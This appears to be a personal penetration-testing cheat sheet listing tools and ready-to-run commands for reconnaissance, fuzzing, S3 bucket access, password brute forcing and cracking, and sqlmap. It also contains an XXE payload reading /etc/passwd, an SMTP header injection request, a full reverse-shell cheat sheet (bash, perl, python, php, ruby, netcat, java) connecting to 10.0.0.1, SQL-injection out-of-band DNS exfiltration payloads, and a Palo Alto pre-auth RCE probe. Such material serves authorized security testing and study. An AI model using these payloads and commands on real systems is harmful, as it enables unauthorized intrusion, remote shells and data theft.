https://github.com/redhuntlabs/Awesome-Asset-Discovery
https://github.com/arkadiyt/bounty-targets-data
http://www.asnlookup.com/
https://appsecco.com/books/subdomain-enumeration/
https://github.com/OWASP/Amass
amass enum -passive -dir /tmp/amass_output/ -d example.com -o dir/example.com
https://github.com/projectdiscovery/subfinder
subfinder -r 8.8.8.8,8.8.4.4,1.1.1.1,1.0.0.1 -t 10 -v -d example.com -o dir/example.com
https://github.com/nsonaniya2010/SubDomainizer
python3 SubDomainizer.py -u example.com -o dir/example.com
https://dns.bufferover.run/dns?q=example.com
https://crt.sh/?q=%25example.com
https://censys.io/certificates?q=parsed.subject_dn%3AO%3DExample+Organization
https://www.shodan.io/search?query=ssl%3AExample
https://www.zoomeye.org/
https://securitytrails.com/list/email/dns-admin.example.com
curl --request POST --url 'https://api.securitytrails.com/v1/domains/list?apikey={API_Key}&page=1&scroll=true' --data '{"filter":{"apex_domain":"example.com"}}' | jq '.records[].hostname' | sed 's/"//g' >> subdomains.txt
curl --request POST --url 'https://api.securitytrails.com/v1/domains/list?apikey={API_Key}&page=1&scroll=true' --data '{"filter":{"whois_email":"domains@example.com"}}' | jq '.records[].hostname' | sed 's/"//g' >> domains.txt
https://viewdns.info/reversewhois/
https://opendata.rapid7.com/
https://github.com/tomnomnom/waybackurls
cat subdomains.txt | waybackurls > waybackurls.txt
https://github.com/tomnomnom/hacks
cat waybackurls.txt | go run /root/Tools/hacks/anti-burl/main.go | tee waybackurls_valid.txt
while read i; do curl -m 15 -ki http://$i &> /dev/null; if [ $? -eq 0 ]; then echo $i; fi; done < subdomains.txt
while read i; do curl -m 15 -ki https://$i &> /dev/null; if [ $? -eq 0 ]; then echo $i; fi; done < subdomains.txt
https://www.giftofspeed.com/cache-checker/
https://github.com/jaeles-project/gospider
gospider -s "https://example.com/" -o output -c 20 -d 10
Access target directly through IP address
http://1.2.3.4
https://1.2.3.4
https://github.com/pielco11/fav-up
Lookups for real IP starting from the favicon icon and using Shodan.
https://portswigger.net/bappstore/21df56baa03d499c8439018fe075d3d7
Wordlist Extractor
https://github.com/ameenmaali/wordlistgen
cat hosts.txt | wordlistgen
https://github.com/adamtlangley/gitscraper
https://github.com/danielmiessler/SecLists
https://github.com/swisskyrepo/PayloadsAllTheThings
https://github.com/fuzzdb-project/fuzzdb
https://github.com/google/fuzzing
https://github.com/xyele/hackerone_wordlist
https://wordlists.assetnote.io/
https://github.com/ffuf/ffuf
ffuf -H 'User-Agent: Mozilla' -v -t 30 -w mydirfilelist.txt -b 'NAME1=VALUE1; NAME2=VALUE2' -u 'https://example.com/FUZZ'
https://github.com/OJ/gobuster
gobuster dir -a 'Mozilla' -e -k -l -t 30 -w mydirfilelist.txt -c 'NAME1=VALUE1; NAME2=VALUE2' -u 'https://example.com/'
https://github.com/tomnomnom/meg
meg -c 50 -H 'User-Agent: Mozilla' -s 200 weblogic.txt example.txt weblogic
https://github.com/deibit/cansina
python3 cansina.py -u 'https://example.com/' -p mydirfilelist.txt --persist
https://ceye.io/
curl http://api.ceye.io/v1/records?token={API Key}&type=dns
curl http://api.ceye.io/v1/records?token={API Key}&type=http
https://portswigger.net/burp/documentation/collaborator
https://www.onsecurity.co.uk/blog/gaining-persistent-access-to-burps-collaborator-sessions
http://pingb.in/
Acquisitions/Names/Addresses/Contacts/Emails/etc.
https://hunter.io
https://intelx.io
https://github.com/khast3x/h8mail
h8mail -t target@example.com
https://dashboard.fullcontact.com
https://www.peopledatalabs.com
HTML/JavaScript Comments
https://www.exploit-db.com/google-hacking-database
Content Security Policy (CSP)
https://csp-evaluator.withgoogle.com/
Brute Force Tiny URLs Services
https://www.scribd.com/doc/308659143/Cornell-Tech-Url-Shortening-Research
https://github.com/doyensec/graph-ql
https://lab.wallarm.com/securing-and-attacking-graphql-part-1-overview/
https://github.com/redhuntlabs/Awesome-Asset-Discovery
https://github.com/phor3nsic/favicon_hash_shodan
Search for a framework by favicon
https://github.com/crashbrz/WebXmlExploiter/
https://github.com/urbanadventurer/WhatWeb
whatweb -a 4 -U 'Mozilla' -c 'NAME1=VALUE1; NAME2=VALUE2' -t 20 www.example.com
https://builtwith.com
https://www.wappalyzer.com
https://webtechsurvey.com
https://portswigger.net/bappstore/c9fb79369b56407792a7104e3c4352fb
Software Vulnerability Scanner Burp Extension
List s3 bucket permissions and keys
https://aws.amazon.com/cli/
aws s3api get-bucket-acl --bucket examples3bucketname
aws s3api get-object-acl --bucket examples3bucketname --key dir/file.ext
aws s3api list-objects --bucket examples3bucketname
aws s3api list-objects-v2 --bucket examples3bucketname
aws s3api get-object --bucket examples3bucketname --key dir/file.ext localfilename.ext
aws s3api put-object --bucket examples3bucketname --key dir/file.ext --body localfilename.ext
Find interesting Amazon S3 Buckets by watching certificate transparency logs
https://github.com/eth0izzle/bucket-stream
Search Public Buckets
https://buckets.grayhatwarfare.com/
Burp Suite extension which can identify and test S3 buckets
https://github.com/VirtueSecurity/aws-extender
Enumerate permissions associated with cloud
https://github.com/andresriancho/enumerate-iam
https://github.com/nccgroup/ScoutSuite
https://github.com/salesforce/cloudsplaining
https://github.com/cloudsploit/scans
https://github.com/RhinoSecurityLabs/pacu
https://github.com/VirtueSecurity/aws-extender
https://github.com/irgoncalves/gcp_security
https://github.com/FortyNorthSecurity/EyeWitness
eyewitness --web --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" --threads 10 --timeout 30 --prepend-https -f "${PWD}/subdomains.txt" -d "${PWD}/eyewitness/"
https://github.com/michenriksen/aquatone
cat targets.txt | aquatone
https://support.portswigger.net/customer/portal/articles/1783127-using-burp-scanner
while read i; do echo $i; echo -e "From: example1@gmail.com\nTo: ${i}\nCc: example2@gmail.com\nSubject: This is the subject ${i}\n\nThis is the body ${i}" | ssmtp ${i},example2@gmail.com; done < emails.txt
References
Ticket Trick https://medium.com/intigriti/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c
Abusing autoresponders and email bounces https://medium.com/intigriti/abusing-autoresponders-and-email-bounces-9b1995eb53c2
https://github.com/vulnersCom/getsploit
getsploit wordpress 4.7.0
https://www.exploit-db.com/searchsploit
searchsploit -t oracle windows
https://github.com/sullo/nikto
nikto -ssl -host www.example.com
https://github.com/wpscanteam/wpscan
wpscan --disable-tls-checks --ignore-main-redirect --user-agent 'Mozilla' -t 10 --force --wp-content-dir wp-content --url blog.example.com
https://github.com/droope/droopescan
droopescan scan drupal -u example.com
https://github.com/defparam/smuggler
python3 smuggler.py -q -u https://example.com/
https://github.com/BishopFox/h2csmuggler
h2csmuggler.py -x https://example.com/ --test
https://github.com/0ang3el/websocket-smuggle
https://portswigger.net/web-security/request-smuggling
https://github.com/PortSwigger/http-request-smuggler
https://medium.com/@ricardoiramar/the-powerful-http-request-smuggling-af208fafa142
https://github.com/anshumanbh/tko-subs
tko-subs -data providers-data.csv -threads 20 -domains subdomains.txt
https://github.com/Ice3man543/SubOver
SubOver -l subdomains.txt
https://github.com/sqlmapproject/sqlmap
sqlmap --force-ssl -r RAW_REQUEST.txt --user-agent='Mozilla' --batch
sqlmap -vv -u 'https://www.example.com?id=1*' --user-agent='Mozilla' --level 5 --risk 3 --batch
https://github.com/zricethezav/gitleaks
gitleaks --github-org=organization --threads=4 -v --disk
https://github.com/michenriksen/gitrob
https://github.com/dxa4481/truffleHog
https://github.com/awslabs/git-secrets
https://github.com/eth0izzle/shhgit
https://www.shhgit.com/
https://github.com/opsdisk/pagodo
python3 pagodo.py -d example.com -g dorks.txt -l 50 -s -e 35.0 -j 1.1
https://github.com/s0md3v/Corsy
python3 corsy.py -u https://example.com
https://github.com/vanhauser-thc/thc-hydra
hydra -l root -P 10-million-password-list-top-1000.txt www.example.com -t 4 ssh
https://www.openwall.com/john/
unshadow /etc/passwd /etc/shadow > mypasswd.txt
john mypasswd.txt
https://hashcat.net/hashcat/
hashcat -m 0 -a 0 hashes.txt passwords.txt
Rotate the source IP address in order to bypass rate limits
https://github.com/ustayready/fireprox
A bash script that automates the exfiltration of data over dns
https://github.com/vp777/procrustes
The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
https://github.com/sensepost/reGeorg
This tool can forward TCP traffic over DNS protocol. Non-compile clients + socks5 support.
https://github.com/fbkcs/ThunderDNS
https://github.com/swisskyrepo/PayloadsAllTheThings
PayloadsAllTheThings
XSS
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
XXE
https://portswigger.net/web-security/xxe
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
https://phonexicum.github.io/infosec/xxe.html
<!DOCTYPE foo SYSTEM "http://xpto.burpcollaborator.net/xpto.dtd">
https://github.com/GoSecure/dtd-finder
Identify DTDs on filesystem snapshot and build XXE payloads using those local DTDs.
https://medium.com/@ricardoiramar/reusing-cookies-23ed4691122b
https://lab.wallarm.com/blind-ssrf-exploitation/
https://github.com/brannondorsey/dns-rebind-toolkit
https://github.com/brannondorsey/whonow
https://nip.io
http://xip.io
https://sslip.io
SMTP Header Injection
https://www.acunetix.com/blog/articles/email-header-injection/
POST /contact.php HTTP/1.1
Host: www.example2.com
name=Best Product\nbcc: everyone@example3.com&replyTo=blame_anna@example.com&message=Buy my product!
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
PERL
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
xterm
xterm -display 10.0.0.1:1
Xnest :1
xhost +targetip
https://github.com/calebstewart/pwncat
DNS Detection
Oracle
'||(SELECT%20UTL_INADDR.GET_HOST_ADDRESS('xpto.example.com'))||'
'||(SELECT%20UTL_HTTP.REQUEST('http://xpto.example.com')%20FROM%20DUAL)||'
'||(SELECT%20HTTPURITYPE('http://xpto.example.com').GETCLOB()%20FROM%20DUAL)||'
'||(SELECT%20DBMS_LDAP.INIT(('xpto.example.com',80)%20FROM%20DUAL)||'
MySQL
'||(SELECT%20LOAD_FILE('\\xpto.example.com'))||'
Microsoft SQL Server
'+;EXEC('master..xp_dirtree"\\xpto.example.com\"');+'
'+;EXEC('master..xp_fileexist"\\xpto.example.com\"');+'
'+;EXEC('master..xp_subdirs"\\xpto.example.com\"');+'
PostgreSQL
'||;COPY%20users(names)%20FROM%20'\\xpto.example.com\';||'
A simple HTTP Request & Response Service.
https://httpbin.org/
# HTTP
while true ; do echo -e "HTTP/1.1 200 OK\nContent-Length: 0\n\n" | nc -vl 1.2.3.4 80; done
# HTTP
python -m SimpleHTTPServer 8080
# HTTP and log request headers and send response
dummy-web-server.py 80
# HTTPS
openssl req -new -x509 -keyout test.key -out test.crt -nodes
cat test.key test.crt > test.pem
socat openssl-listen:443,reuseaddr,cert=test.pem,verify=0,fork stdio
# FTP
python -m pyftpdlib --directory=/tmp/dir/ --port=21
# Trim space and newlines on bash variable
"${i//[$'\t\r\n ']}"
The Cyber Swiss Army Knife
https://gchq.github.io/CyberChef/
Check PreAuth RCE on Palo Alto GlobalProtect
https://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
time curl -s -d 'scep-profile-name=%9999999c' https://${HOST}/sslmgr >/dev/null
time curl -s -d 'scep-profile-name=%99999999c' https://${HOST}/sslmgr >/dev/null
time curl -s -d 'scep-profile-name=%999999999c' https://${HOST}/sslmgr >/dev/null